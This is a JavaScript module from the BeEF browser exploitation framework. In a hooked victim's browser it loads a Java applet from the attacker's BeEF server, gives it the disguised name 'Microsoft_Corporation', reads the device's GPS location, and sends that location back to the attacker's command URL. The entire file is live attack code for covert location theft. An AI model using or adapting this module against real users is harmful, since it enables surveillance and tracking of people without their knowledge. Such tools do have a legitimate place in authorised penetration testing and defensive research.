22 lines
759 B
JavaScript
Executable File
22 lines
759 B
JavaScript
Executable File
/*
|
|
* Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
|
|
* Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
* See the file 'doc/COPYING' for copying permission
|
|
*/
|
|
|
|
beef.execute(function() {
|
|
var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
|
|
var applet_id = '<%= @applet_id %>';
|
|
var applet_name = '<%= @applet_name %>';
|
|
var output;
|
|
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'getGPSLocation' ,
|
|
null, applet_archive, null);
|
|
output = document.Microsoft_Corporation.getInfo();
|
|
if (output) {
|
|
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output);
|
|
}
|
|
beef.dom.detachApplet('getGPSLocation');
|
|
});
|
|
|
|
|